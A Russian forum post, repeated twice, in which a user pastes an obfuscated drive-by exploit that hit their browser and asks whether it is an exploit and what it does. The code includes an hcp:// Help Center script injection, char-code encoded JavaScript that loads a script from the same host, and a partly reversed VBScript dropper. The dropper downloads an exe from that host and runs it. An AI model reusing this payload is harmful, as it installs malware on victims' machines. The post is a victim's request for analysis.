dr.Web
01.10.2010, 03:21
Вот такая штучка вежливо попросилась ко мне в систему. Самопроизвольно запустился Windows media player.
http://sexshop123.ru:81/el/z3l54j/oor5qphv.php?act=iframe&fh=
во фрейме видим код
PHP:
hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%A..%5C..%5Csysinfomain.htm%u003fsvr=%3 Cscript%20defer%3Eeval%28eval%28%27String.fromChar Code(118,97,114,32,111,61,100,111,99,117,109,101,1 10,116,46,99,114,101,97,116,101,69,108,101,109,101 ,110,116,40,34,115,99,114,105,112,116,34,41,59,111 ,46,115,101,116,65,116,116,114,105,98,117,116,101, 40,34,116,121,112,101,34,44,34,116,101,120,116,47, 106,97,118,97,115,99,114,105,112,116,34,41,59,111, 46,115,101,116,65,116,116,114,105,98,117,116,101,4 0,34,115,114,99,34,44,34,104,116,116,112,58,47,47, 115,101,120,115,104,111,112,49,50,51,46,114,117,58 ,56,49,47,101,108,47,122,51,108,53,52,106,47,111,1 11,114,53,113,112,104,118,46,112,104,112,63,97,99, 116,61,106,115,38,102,104,61,34,41,59,100,111,99,1 17,109,101,110,116,46,98,111,100,121,46,97,112,112 ,101,110,100,67,104,105,108,100,40,111,41,59)%27%2 9%29%3C/script%3E
который редактируем и выполняем
PHP:
javascript:alert(String.fromCharCode(118,97,114,32 ,111,61,100,111,99,117,109,101,110,116,46,99,114,1 01,97,116,101,69,108,101,109,101,110,116,40,34,115 ,99,114,105,112,116,34,41,59,111,46,115,101,116,65 ,116,116,114,105,98,117,116,101,40,34,116,121,112, 101,34,44,34,116,101,120,116,47,106,97,118,97,115, 99,114,105,112,116,34,41,59,111,46,115,101,116,65, 116,116,114,105,98,117,116,101,40,34,115,114,99,34 ,44,34,104,116,116,112,58,47,47,115,101,120,115,10 4,111,112,49,50,51,46,114,117,58,56,49,47,101,108, 47,122,51,108,53,52,106,47,111,111,114,53,113,112, 104,118,46,112,104,112,63,97,99,116,61,106,115,38, 102,104,61,34,41,59,100,111,99,117,109,101,110,116 ,46,98,111,100,121,46,97,112,112,101,110,100,67,10 4,105,108,100,40,111,41,59))
Выяснилось что подключается сторонний скрипт с того же сервера.
PHP:
Run(String.fromCharCode(99,109,100,32,47,99,32,101 ,99,104,111,32,83,101,116,32,65,114,103,79,98,106, 32,61,32,87,83,99,114,105,112,116,46,65,114,103,11 7,109,101,110,116,115,58,107,101,121,32,61,32,65,1 14,103,79,98,106,46,73,116,101,109,40,48,41,58,101 ,120,101,32,61,32,34,41,88,118,88,118,88,115,98,11 8,46,53,55,49,56,50,50,54,88,118,88,118,88,32,43,3 2,114,101,100,108,111,102,112,109,116,40,101,108,1 05,102,101,116,101,108,101,100,46,111,115,102,58,1 01,108,105,102,112,109,116,32,43,32,114,101,100,10 8,111,102,112,109,116,32,99,101,120,101,46,108,108 ,101,104,115,58,50,32,44,101,108,105,102,112,109,1 16,32,43,32,114,101,100,108,111,102,112,109,116,32 ,101,108,105,102,111,116,101,118,97,115,46,109,97, 101,114,116,115,111,100,97,111,58,32,121,100,111,9 8,101,115,110,111,112,115,101,114,46,112,116,116,1 04,108,109,120,32,32,101,116,105,114,119,46,109,97 ,101,114,116,115,111,100,97,111,58,32,110,101,112, 111,46,109,97,101,114,116,115,111,100,97,111,58,32 ,49,32,61,32,101,112,121,116,46,109,97,101,114,116 ,115,111,100,97,111,58,32,51,32,61,32,101,100,111, 109,46,109,97,101,114,116,115,111,100,97,111,58,10 0,110,101,83,46,112,116,116,104,108,109,120,58,48, 32,44,108,114,117,32,44,88,118,88,118,88,84,69,71, 88,118,88,118,88,32,110,101,112,79,46,112,116,116, 104,108,109,120,58,88,118,88,118,88,101,120,101,46 ,53,55,49,56,50,50,54,88,118,88,118,88,32,61,32,10 1,108,105,102,112,109,116,58,88,118,88,118,88,92,8 8,118,88,118,88,32,43,32,41,88,118,88,118,88,80,77 ,69,84,88,118,88,118,88,40,109,101,116,105,46,41,8 8,118,88,118,88,83,83,69,67,79,82,80,88,118,88,118 ,88,40,116,110,101,109,110,111,114,105,118,110,101 ,46,108,108,101,104,115,32,61,32,114,101,100,108,1 11,102,112,109,116,58,88,118,88,118,88,61,104,102, 38,80,67,72,61,108,112,115,63,112,104,112,46,55,54 ,57,117,105,98,117,120,47,106,52,53,108,51,122,47, 108,101,47,49,56,58,117,114,46,51,50,49,112,111,10 4,115,120,101,115,47,47,58,112,116,116,104,88,118, 88,118,88,32,61,32,108,114,117,58,41,88,118,88,118 ,88,116,99,101,106,98,111,109,101,116,115,121,115, 101,108,105,70,46,103,110,105,116,112,105,114,99,8 3,88,118,88,118,88,40,116,99,101,106,98,111,101,11 6,97,101,114,99,32,61,32,111,115,102,32,116,101,11 5,58,41,88,118,88,118,88,108,108,101,104,83,46,116 ,112,105,114,99,83,87,88,118,88,118,88,40,116,99,1 01,106,98,111,101,116,97,101,114,99,32,61,32,108,1 08,101,104,115,32,116,101,115,58,41,88,118,88,118, 88,109,97,101,114,116,115,46,98,100,111,100,97,88, 118,88,118,88,40,116,99,101,106,98,111,101,116,97, 101,114,99,32,61,32,109,97,101,114,116,115,111,100 ,97,111,32,116,101,115,58,41,88,118,88,118,88,80,8 4,84,72,76,77,88,46,50,76,77,88,83,77,88,118,88,11 8,88,40,116,99,101,106,98,111,101,116,97,101,114,9 9,32,61,32,112,116,116,104,108,109,120,32,116,101, 115,34,58,101,120,101,32,61,32,82,101,112,108,97,9 9,101,40,101,120,101,44,107,101,121,44,67,104,114, 40,51,52,41,41,58,101,120,101,32,61,32,83,116,114, 82,101,118,101,114,115,101,40,101,120,101,41,58,10 1,120,101,99,117,116,101,40,101,120,101,41,32,62,3 7,84,69,77,80,37,92,54,50,50,56,49,55,53,46,118,98 ,115,32,38,99,115,99,114,105,112,116,32,37,84,69,7 7,80,37,92,54,50,50,56,49,55,53,46,118,98,115,32,4 7,47,98,32,47,47,115,32,88,118,88,118,88));
Подредактировав его выводим его в алерт
PHP:
cmd/cechoSet ArgObj=WScript.Arguments:key=ArgObj.Item (0):exe=")XvXvXsbv.5718226XvXvX + redlofpmt(elifeteled.os f:elifpmt + redlofpmt cexe.llehs:2 ,elifpmt + redlofpmt elifotevas.maertsodao: ydobesnopser. ptthlmx etirw.maertsodao: nepo.maertsodao: 1 = epyt.maertsodao: 3 = edom.maertsodao:dneS.p tthlmx:0 ,lru ,XvXvXTEGXvXvX nepO.ptthlmx:XvXvX exe.5718226XvXvX = elifpmt:XvXvX\XvXvX + )XvXv XPMETXvXvX(meti.)XvXvXSSECORPXvXvX(tnemnorivne.lle hs = redlofpmt:XvXvX=hf&PCH=lps?php.769uibux/j45l3z/le/18:ur.321pohsxes//:ptthXvXvX = lru:)XvXvXtcejbometsyseliF.gnitpirc SXvXvX(tcejboetaerc = osf tes:)XvXvXllehS.tpirc SWXvXvX(tcejboetaerc = llehs tes:)XvXvXmaerts.b dodaXvXvX(tcejboetaerc = maertsodao tes:)XvXvXP TTHLMX.2LMXSMXvXvX(tcejboetaerc = ptthlmx tes":exe=Replace(exe,key,Chr(34)):exe=StrReverse(exe): execute(exe) >%TEMP%\6228175.vbs&cscript%TEMP%\6228175.vbs//b //s XvXvX
По коду заметил что часть его перевёрнута задом на перёд. А теперь вопрос, это сплоит?)
И что делает этот код?
http://sexshop123.ru:81/el/z3l54j/oor5qphv.php?act=iframe&fh=
во фрейме видим код
PHP:
hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%A..%5C..%5Csysinfomain.htm%u003fsvr=%3 Cscript%20defer%3Eeval%28eval%28%27String.fromChar Code(118,97,114,32,111,61,100,111,99,117,109,101,1 10,116,46,99,114,101,97,116,101,69,108,101,109,101 ,110,116,40,34,115,99,114,105,112,116,34,41,59,111 ,46,115,101,116,65,116,116,114,105,98,117,116,101, 40,34,116,121,112,101,34,44,34,116,101,120,116,47, 106,97,118,97,115,99,114,105,112,116,34,41,59,111, 46,115,101,116,65,116,116,114,105,98,117,116,101,4 0,34,115,114,99,34,44,34,104,116,116,112,58,47,47, 115,101,120,115,104,111,112,49,50,51,46,114,117,58 ,56,49,47,101,108,47,122,51,108,53,52,106,47,111,1 11,114,53,113,112,104,118,46,112,104,112,63,97,99, 116,61,106,115,38,102,104,61,34,41,59,100,111,99,1 17,109,101,110,116,46,98,111,100,121,46,97,112,112 ,101,110,100,67,104,105,108,100,40,111,41,59)%27%2 9%29%3C/script%3E
который редактируем и выполняем
PHP:
javascript:alert(String.fromCharCode(118,97,114,32 ,111,61,100,111,99,117,109,101,110,116,46,99,114,1 01,97,116,101,69,108,101,109,101,110,116,40,34,115 ,99,114,105,112,116,34,41,59,111,46,115,101,116,65 ,116,116,114,105,98,117,116,101,40,34,116,121,112, 101,34,44,34,116,101,120,116,47,106,97,118,97,115, 99,114,105,112,116,34,41,59,111,46,115,101,116,65, 116,116,114,105,98,117,116,101,40,34,115,114,99,34 ,44,34,104,116,116,112,58,47,47,115,101,120,115,10 4,111,112,49,50,51,46,114,117,58,56,49,47,101,108, 47,122,51,108,53,52,106,47,111,111,114,53,113,112, 104,118,46,112,104,112,63,97,99,116,61,106,115,38, 102,104,61,34,41,59,100,111,99,117,109,101,110,116 ,46,98,111,100,121,46,97,112,112,101,110,100,67,10 4,105,108,100,40,111,41,59))
Выяснилось что подключается сторонний скрипт с того же сервера.
PHP:
Run(String.fromCharCode(99,109,100,32,47,99,32,101 ,99,104,111,32,83,101,116,32,65,114,103,79,98,106, 32,61,32,87,83,99,114,105,112,116,46,65,114,103,11 7,109,101,110,116,115,58,107,101,121,32,61,32,65,1 14,103,79,98,106,46,73,116,101,109,40,48,41,58,101 ,120,101,32,61,32,34,41,88,118,88,118,88,115,98,11 8,46,53,55,49,56,50,50,54,88,118,88,118,88,32,43,3 2,114,101,100,108,111,102,112,109,116,40,101,108,1 05,102,101,116,101,108,101,100,46,111,115,102,58,1 01,108,105,102,112,109,116,32,43,32,114,101,100,10 8,111,102,112,109,116,32,99,101,120,101,46,108,108 ,101,104,115,58,50,32,44,101,108,105,102,112,109,1 16,32,43,32,114,101,100,108,111,102,112,109,116,32 ,101,108,105,102,111,116,101,118,97,115,46,109,97, 101,114,116,115,111,100,97,111,58,32,121,100,111,9 8,101,115,110,111,112,115,101,114,46,112,116,116,1 04,108,109,120,32,32,101,116,105,114,119,46,109,97 ,101,114,116,115,111,100,97,111,58,32,110,101,112, 111,46,109,97,101,114,116,115,111,100,97,111,58,32 ,49,32,61,32,101,112,121,116,46,109,97,101,114,116 ,115,111,100,97,111,58,32,51,32,61,32,101,100,111, 109,46,109,97,101,114,116,115,111,100,97,111,58,10 0,110,101,83,46,112,116,116,104,108,109,120,58,48, 32,44,108,114,117,32,44,88,118,88,118,88,84,69,71, 88,118,88,118,88,32,110,101,112,79,46,112,116,116, 104,108,109,120,58,88,118,88,118,88,101,120,101,46 ,53,55,49,56,50,50,54,88,118,88,118,88,32,61,32,10 1,108,105,102,112,109,116,58,88,118,88,118,88,92,8 8,118,88,118,88,32,43,32,41,88,118,88,118,88,80,77 ,69,84,88,118,88,118,88,40,109,101,116,105,46,41,8 8,118,88,118,88,83,83,69,67,79,82,80,88,118,88,118 ,88,40,116,110,101,109,110,111,114,105,118,110,101 ,46,108,108,101,104,115,32,61,32,114,101,100,108,1 11,102,112,109,116,58,88,118,88,118,88,61,104,102, 38,80,67,72,61,108,112,115,63,112,104,112,46,55,54 ,57,117,105,98,117,120,47,106,52,53,108,51,122,47, 108,101,47,49,56,58,117,114,46,51,50,49,112,111,10 4,115,120,101,115,47,47,58,112,116,116,104,88,118, 88,118,88,32,61,32,108,114,117,58,41,88,118,88,118 ,88,116,99,101,106,98,111,109,101,116,115,121,115, 101,108,105,70,46,103,110,105,116,112,105,114,99,8 3,88,118,88,118,88,40,116,99,101,106,98,111,101,11 6,97,101,114,99,32,61,32,111,115,102,32,116,101,11 5,58,41,88,118,88,118,88,108,108,101,104,83,46,116 ,112,105,114,99,83,87,88,118,88,118,88,40,116,99,1 01,106,98,111,101,116,97,101,114,99,32,61,32,108,1 08,101,104,115,32,116,101,115,58,41,88,118,88,118, 88,109,97,101,114,116,115,46,98,100,111,100,97,88, 118,88,118,88,40,116,99,101,106,98,111,101,116,97, 101,114,99,32,61,32,109,97,101,114,116,115,111,100 ,97,111,32,116,101,115,58,41,88,118,88,118,88,80,8 4,84,72,76,77,88,46,50,76,77,88,83,77,88,118,88,11 8,88,40,116,99,101,106,98,111,101,116,97,101,114,9 9,32,61,32,112,116,116,104,108,109,120,32,116,101, 115,34,58,101,120,101,32,61,32,82,101,112,108,97,9 9,101,40,101,120,101,44,107,101,121,44,67,104,114, 40,51,52,41,41,58,101,120,101,32,61,32,83,116,114, 82,101,118,101,114,115,101,40,101,120,101,41,58,10 1,120,101,99,117,116,101,40,101,120,101,41,32,62,3 7,84,69,77,80,37,92,54,50,50,56,49,55,53,46,118,98 ,115,32,38,99,115,99,114,105,112,116,32,37,84,69,7 7,80,37,92,54,50,50,56,49,55,53,46,118,98,115,32,4 7,47,98,32,47,47,115,32,88,118,88,118,88));
Подредактировав его выводим его в алерт
PHP:
cmd/cechoSet ArgObj=WScript.Arguments:key=ArgObj.Item (0):exe=")XvXvXsbv.5718226XvXvX + redlofpmt(elifeteled.os f:elifpmt + redlofpmt cexe.llehs:2 ,elifpmt + redlofpmt elifotevas.maertsodao: ydobesnopser. ptthlmx etirw.maertsodao: nepo.maertsodao: 1 = epyt.maertsodao: 3 = edom.maertsodao:dneS.p tthlmx:0 ,lru ,XvXvXTEGXvXvX nepO.ptthlmx:XvXvX exe.5718226XvXvX = elifpmt:XvXvX\XvXvX + )XvXv XPMETXvXvX(meti.)XvXvXSSECORPXvXvX(tnemnorivne.lle hs = redlofpmt:XvXvX=hf&PCH=lps?php.769uibux/j45l3z/le/18:ur.321pohsxes//:ptthXvXvX = lru:)XvXvXtcejbometsyseliF.gnitpirc SXvXvX(tcejboetaerc = osf tes:)XvXvXllehS.tpirc SWXvXvX(tcejboetaerc = llehs tes:)XvXvXmaerts.b dodaXvXvX(tcejboetaerc = maertsodao tes:)XvXvXP TTHLMX.2LMXSMXvXvX(tcejboetaerc = ptthlmx tes":exe=Replace(exe,key,Chr(34)):exe=StrReverse(exe): execute(exe) >%TEMP%\6228175.vbs&cscript%TEMP%\6228175.vbs//b //s XvXvX
По коду заметил что часть его перевёрнута задом на перёд. А теперь вопрос, это сплоит?)
И что делает этот код?